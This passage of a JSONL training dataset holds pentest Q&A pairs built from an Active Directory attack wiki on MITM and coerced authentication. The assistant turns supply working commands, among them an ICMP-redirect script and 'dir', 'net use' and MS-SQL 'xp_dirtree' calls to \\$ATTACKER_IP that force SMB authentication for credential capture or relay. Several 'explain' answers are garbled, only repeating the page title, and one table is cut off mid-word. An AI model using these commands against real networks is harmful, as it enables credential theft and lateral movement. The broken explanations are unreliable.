834, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/icmp-redirect.md", "page_title": "🛠️ ICMP Redirect", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ ICMP Redirect"}, {"role": "assistant", "content": "python3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ ICMP Redirect", "response": "python3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2", "metadata": {"corpus_index": 834, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/icmp-redirect.md", "page_title": "🛠️ ICMP Redirect", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2`?"}, {"role": "assistant", "content": "This command is used for 🛠️ icmp redirect. 🛠️ ICMP Redirect"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 tools/Icmp-Redirect.py --interface eth0 --ip $my_ip --gateway $gateway --target $target --route $dnsserver1 --secondaryroute $dnsserver2`?", "response": "This command is used for 🛠️ icmp redirect. 🛠️ ICMP Redirect", "metadata": {"corpus_index": 834, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/icmp-redirect.md", "page_title": "🛠️ ICMP Redirect", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of MITM and coerced auths"}, {"role": "assistant", "content": "In Active Directory domains, attackers often rely on coerced authentications and MitM (man in the middle) techniques to operate lateral movement, especially when attempting authentication relaying attacks (e.g. NTLM relay or Kerberos relay), or when abusing Kerberos delegations.\n\nThese techniques enable attackers to redirect traffic or redirect/force targets authentications. Attackers will then be able, in certain cases, to capture credentials or relay authentications. I'm using \"coerce\" instead of \"force\" in this category's title since some technique can rely on a bit of social engineering to work.\n\nThere are many ways attackers can do MitM or redirect/force targets authentications, most of which can be combined for maximum impact (and minimum stealth).\n\n> [!WARNING]\n> This page is a work-in-progress\n\n| MITM Technique | ADIDNS | LLMNR | NBNS | DHCPv6 | ARP | DNS | WPAD | PrinterBug | PrivExchange |\n| --------------------------------------------------------------------- | -------------------------- | ------------------------------------ | ------------------------------------ | --------------------------- | ------------------------------------------------------------------ | ---------------------- | ------------------------ | ------------------------ | -------------------------------- |\n| Can require waiting for replication/syncing | x | | | | | | | | |\n| Easy to start and stop attacks | | x | x | takes \\~5 minutes to revert | revert time depends on targets arp cache timeout (usually \\~60 sec | x | x | x | x |\n| Exploitable when default settings are present | x | x | x | x | x | x | x | x | up to 2019 |\n| Impacts fully qualified name requests | x | not if wildcard ADIDNS record exists | not if wildcard ADIDNS record exists | x | | x | | | |\n| Requires constant network traffic for spoofing | | x | x | x | x | x | x | | |\n| Requires domain credentials | x | | | | | | | x | requires emails-capable account |\n| Requires editing AD | x | | | | | | | | |\n| Requires privileg"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of MITM and coerced auths", "response": "In Active Directory domains, attackers often rely on coerced authentications and MitM (man in the middle) techniques to operate lateral movement, especially when attempting authentication relaying attacks (e.g. NTLM relay or Kerberos relay), or when abusing Kerberos delegations.\n\nThese techniques enable attackers to redirect traffic or redirect/force targets authentications. Attackers will then be able, in certain cases, to capture credentials or relay authentications. I'm using \"coerce\" instead of \"force\" in this category's title since some technique can rely on a bit of social engineering to work.\n\nThere are many ways attackers can do MitM or redirect/force targets authentications, most of which can be combined for maximum impact (and minimum stealth).\n\n> [!WARNING]\n> This page is a work-in-progress\n\n| MITM Technique | ADIDNS | LLMNR | NBNS | DHCPv6 | ARP | DNS | WPAD | PrinterBug | PrivExchange |\n| --------------------------------------------------------------------- | -------------------------- | ------------------------------------ | ------------------------------------ | --------------------------- | ------------------------------------------------------------------ | ---------------------- | ------------------------ | ------------------------ | -------------------------------- |\n| Can require waiting for replication/syncing | x | | | | | | | | |\n| Easy to start and stop attacks | | x | x | takes \\~5 minutes to revert | revert time depends on targets arp cache timeout (usually \\~60 sec | x | x | x | x |\n| Exploitable when default settings are present | x | x | x | x | x | x | x | x | up to 2019 |\n| Impacts fully qualified name requests | x | not if wildcard ADIDNS record exists | not if wildcard ADIDNS record exists | x | | x | | | |\n| Requires constant network traffic for spoofing | | x | x | x | x | x | x | | |\n| Requires domain credentials | x | | | | | | | x | requires emails-capable account |\n| Requires editing AD | x | | | | | | | | |\n| Requires privileg", "metadata": {"corpus_index": 835, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/index.md", "page_title": "MITM and coerced auths", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MITM and coerced auths"}, {"role": "assistant", "content": "In Active Directory domains, attackers often rely on coerced authentications and MitM (man in the middle) techniques to operate lateral movement, especially when attempting authentication relaying attacks (e.g. NTLM relay or Kerberos relay), or when abusing Kerberos delegations.\n\nThese techniques enable attackers to redirect traffic or redirect/force targets authentications. Attackers will then be able, in certain cases, to capture credentials or relay authentications. I'm using \"coerce\" instead of \"force\" in this category's title since some technique can rely on a bit of social engineering to work.\n\nThere are many ways attackers can do MitM or redirect/force targets authentications, most of which can be combined for maximum impact (and minimum stealth).\n\n> [!WARNING]\n> This page is a work-in-progress\n\n| MITM Technique | ADIDNS | LLMNR | NBNS | DHCPv6 | ARP | DNS | WPAD | PrinterBug | PrivExchange |\n| --------------------------------------------------------------------- | -------------------------- | ------------------------------------ | ------------------------------------ | --------------------------- | ------------------------------------------------------------------ | ---------------------- | ------------------------ | ------------------------ | -------------------------------- |\n| Can require waiting for replication/syncing | x | | | | | | | | |\n| Easy to start and stop attacks | | x | x | takes \\~5 minutes to revert | revert time depends on targets arp cache timeout (usually \\~60 sec | x | x | x | x |\n| Exploitable when default settings are present | x | x | x | x | x | x | x | x | up to 2019 |\n| Impacts fully qualified name requests | x | not if wildcard ADIDNS record exists | not if wildcard ADIDNS record exists | x | | x | | | |\n| Requires constant network traffic for spoofing | | x | x | x | x | x | x | | |\n| Requires domain credentials | x | | | | | | | x | requires emails-capable account |\n| Requires editing AD | x | | | | | | | | |\n| Requires privileg"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MITM and coerced auths", "response": "In Active Directory domains, attackers often rely on coerced authentications and MitM (man in the middle) techniques to operate lateral movement, especially when attempting authentication relaying attacks (e.g. NTLM relay or Kerberos relay), or when abusing Kerberos delegations.\n\nThese techniques enable attackers to redirect traffic or redirect/force targets authentications. Attackers will then be able, in certain cases, to capture credentials or relay authentications. I'm using \"coerce\" instead of \"force\" in this category's title since some technique can rely on a bit of social engineering to work.\n\nThere are many ways attackers can do MitM or redirect/force targets authentications, most of which can be combined for maximum impact (and minimum stealth).\n\n> [!WARNING]\n> This page is a work-in-progress\n\n| MITM Technique | ADIDNS | LLMNR | NBNS | DHCPv6 | ARP | DNS | WPAD | PrinterBug | PrivExchange |\n| --------------------------------------------------------------------- | -------------------------- | ------------------------------------ | ------------------------------------ | --------------------------- | ------------------------------------------------------------------ | ---------------------- | ------------------------ | ------------------------ | -------------------------------- |\n| Can require waiting for replication/syncing | x | | | | | | | | |\n| Easy to start and stop attacks | | x | x | takes \\~5 minutes to revert | revert time depends on targets arp cache timeout (usually \\~60 sec | x | x | x | x |\n| Exploitable when default settings are present | x | x | x | x | x | x | x | x | up to 2019 |\n| Impacts fully qualified name requests | x | not if wildcard ADIDNS record exists | not if wildcard ADIDNS record exists | x | | x | | | |\n| Requires constant network traffic for spoofing | | x | x | x | x | x | x | | |\n| Requires domain credentials | x | | | | | | | x | requires emails-capable account |\n| Requires editing AD | x | | | | | | | | |\n| Requires privileg", "metadata": {"corpus_index": 835, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/index.md", "page_title": "MITM and coerced auths", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Living off the land?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Living off the land?", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name", "metadata": {"corpus_index": 836, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Living off the land"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Living off the land", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name", "metadata": {"corpus_index": 836, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Living off the land - Theory"}, {"role": "assistant", "content": "> In the physical world, “living off the land” simply means to survive only by the resources that you can harvest from the natural land. There may be multiple reasons for doing this — perhaps you want to get “off the grid,” or maybe you have something or someone to hide from. Or maybe you just like the challenge of being self-sufficient.\n>\n> In the technology world, “living off the land” (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. (source)\n\nThere are multiple \"living off the land\" techniques that can be used to force authentications, to capture hashes, or to relay authentications. In order to use those techniques, testers need to have an initial access to \"the land\", i.e. the tools or features the technique uses."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Living off the land - Theory", "response": "> In the physical world, “living off the land” simply means to survive only by the resources that you can harvest from the natural land. There may be multiple reasons for doing this — perhaps you want to get “off the grid,” or maybe you have something or someone to hide from. Or maybe you just like the challenge of being self-sufficient.\n>\n> In the technology world, “living off the land” (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. (source)\n\nThere are multiple \"living off the land\" techniques that can be used to force authentications, to capture hashes, or to relay authentications. In order to use those techniques, testers need to have an initial access to \"the land\", i.e. the tools or features the technique uses.", "metadata": {"corpus_index": 837, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Living off the land - Theory?"}, {"role": "assistant", "content": "> In the physical world, “living off the land” simply means to survive only by the resources that you can harvest from the natural land. There may be multiple reasons for doing this — perhaps you want to get “off the grid,” or maybe you have something or someone to hide from. Or maybe you just like the challenge of being self-sufficient.\n>\n> In the technology world, “living off the land” (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. (source)\n\nThere are multiple \"living off the land\" techniques that can be used to force authentications, to capture hashes, or to relay authentications. In order to use those techniques, testers need to have an initial access to \"the land\", i.e. the tools or features the technique uses."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Living off the land - Theory?", "response": "> In the physical world, “living off the land” simply means to survive only by the resources that you can harvest from the natural land. There may be multiple reasons for doing this — perhaps you want to get “off the grid,” or maybe you have something or someone to hide from. Or maybe you just like the challenge of being self-sufficient.\n>\n> In the technology world, “living off the land” (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. (source)\n\nThere are multiple \"living off the land\" techniques that can be used to force authentications, to capture hashes, or to relay authentications. In order to use those techniques, testers need to have an initial access to \"the land\", i.e. the tools or features the technique uses.", "metadata": {"corpus_index": 837, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Living off the land - Practice"}, {"role": "assistant", "content": "Those techniques will usually generate outgoing traffic on SMB or HTTP, hence requiring the attacker to set up an SMB or HTTP server to capture or relay the authentication (e.g. using tools like Responder (Python), Inveigh (Powershell), ntlmrelayx (Python) or Inveigh-Relay (Powershell))."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Living off the land - Practice", "response": "Those techniques will usually generate outgoing traffic on SMB or HTTP, hence requiring the attacker to set up an SMB or HTTP server to capture or relay the authentication (e.g. using tools like Responder (Python), Inveigh (Powershell), ntlmrelayx (Python) or Inveigh-Relay (Powershell)).", "metadata": {"corpus_index": 838, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Living off the land - Practice?"}, {"role": "assistant", "content": "Those techniques will usually generate outgoing traffic on SMB or HTTP, hence requiring the attacker to set up an SMB or HTTP server to capture or relay the authentication (e.g. using tools like Responder (Python), Inveigh (Powershell), ntlmrelayx (Python) or Inveigh-Relay (Powershell))."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Living off the land - Practice?", "response": "Those techniques will usually generate outgoing traffic on SMB or HTTP, hence requiring the attacker to set up an SMB or HTTP server to capture or relay the authentication (e.g. using tools like Responder (Python), Inveigh (Powershell), ntlmrelayx (Python) or Inveigh-Relay (Powershell)).", "metadata": {"corpus_index": 838, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Living off the land - Command execution"}, {"role": "assistant", "content": "On Windows machines, cmdlets like net or dir can be used to make the machine access a remote resource, hence making it authenticate. This leads to an outgoing traffic using SMB.\n\n``bash\ndir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something\n``\n\nThe rpcping command can also be used to trigger an authentication. The perk of this technique is that the auth won't carry a signing negotiation flag, hence allowing for relays"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Living off the land - Command execution", "response": "On Windows machines, cmdlets like net or dir can be used to make the machine access a remote resource, hence making it authenticate. This leads to an outgoing traffic using SMB.\n\n``bash\ndir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something\n``\n\nThe rpcping command can also be used to trigger an authentication. The perk of this technique is that the auth won't carry a signing negotiation flag, hence allowing for relays", "metadata": {"corpus_index": 839, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Living off the land - Command execution"}, {"role": "assistant", "content": "On Windows machines, cmdlets like net or dir can be used to make the machine access a remote resource, hence making it authenticate. This leads to an outgoing traffic using SMB.\n\n``bash\ndir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something\n``\n\nThe rpcping command can also be used to trigger an authentication. The perk of this technique is that the auth won't carry a signing negotiation flag, hence allowing for relays"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Living off the land - Command execution", "response": "On Windows machines, cmdlets like net or dir can be used to make the machine access a remote resource, hence making it authenticate. This leads to an outgoing traffic using SMB.\n\n``bash\ndir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something\n``\n\nThe rpcping command can also be used to trigger an authentication. The perk of this technique is that the auth won't carry a signing negotiation flag, hence allowing for relays", "metadata": {"corpus_index": 839, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use dir for 🛠️ living off the land - command execution?"}, {"role": "assistant", "content": "dir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use dir for 🛠️ living off the land - command execution?", "response": "dir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something", "metadata": {"corpus_index": 840, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dir"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Living off the land - Command execution during a pentest?"}, {"role": "assistant", "content": "dir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Living off the land - Command execution during a pentest?", "response": "dir \\\\$ATTACKER_IP\\something\nnet use \\\\$ATTACKER_IP\\something", "metadata": {"corpus_index": 840, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dir \\\\$ATTACKER_IP\\something`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - command execution. Command execution"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dir \\\\$ATTACKER_IP\\something`?", "response": "This command is used for 🛠️ living off the land - command execution. Command execution", "metadata": {"corpus_index": 840, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Living off the land - MS-SQL queries execution"}, {"role": "assistant", "content": "On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. This leads to an outgoing traffic using SMB.\n\n``bash\nEXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Living off the land - MS-SQL queries execution", "response": "On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. This leads to an outgoing traffic using SMB.\n\n``bash\nEXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1\n``", "metadata": {"corpus_index": 841, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Living off the land - MS-SQL queries execution"}, {"role": "assistant", "content": "On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. This leads to an outgoing traffic using SMB.\n\n``bash\nEXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Living off the land - MS-SQL queries execution", "response": "On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. This leads to an outgoing traffic using SMB.\n\n``bash\nEXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1\n``", "metadata": {"corpus_index": 841, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use EXEC for 🛠️ living off the land - ms-sql queries execution?"}, {"role": "assistant", "content": "EXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use EXEC for 🛠️ living off the land - ms-sql queries execution?", "response": "EXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1", "metadata": {"corpus_index": 842, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "EXEC"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Living off the land - MS-SQL queries execution"}, {"role": "assistant", "content": "EXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Living off the land - MS-SQL queries execution", "response": "EXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1", "metadata": {"corpus_index": 842, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `EXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - ms-sql queries execution. MS-SQL queries execution"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `EXEC master.sys.xp_dirtree '\\\\$ATTACKER_IP\\something',1,1`?", "response": "This command is used for 🛠️ living off the land - ms-sql queries execution. MS-SQL queries execution", "metadata": {"corpus_index": 842, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Living off the land - File explorer work?"}, {"role": "assistant", "content": "On Windows machines, the file explorer can be used to access remote resources like SMB shares by supplying its UNC path (i.e. \\\\$ATTACKER_IP\\something) in the research bar. This leads to an outgoing traffic using SMB."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Living off the land - File explorer work?", "response": "On Windows machines, the file explorer can be used to access remote resources like SMB shares by supplying its UNC path (i.e. \\\\$ATTACKER_IP\\something) in the research bar. This leads to an outgoing traffic using SMB.", "metadata": {"corpus_index": 843, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Living off the land - File explorer"}, {"role": "assistant", "content": "On Windows machines, the file explorer can be used to access remote resources like SMB shares by supplying its UNC path (i.e. \\\\$ATTACKER_IP\\something) in the research bar. This leads to an outgoing traffic using SMB."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Living off the land - File explorer", "response": "On Windows machines, the file explorer can be used to access remote resources like SMB shares by supplying its UNC path (i.e. \\\\$ATTACKER_IP\\something) in the research bar. This leads to an outgoing traffic using SMB.", "metadata": {"corpus_index": 843, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Living off the land - Internet browser"}, {"role": "assistant", "content": "Internet browsers can access HTTP servers by supplying their URL (i.e. http://$IP:$PORT/something) in the research bar. This technique is rarely used as it can pop up a prompt. This leads to an outgoing 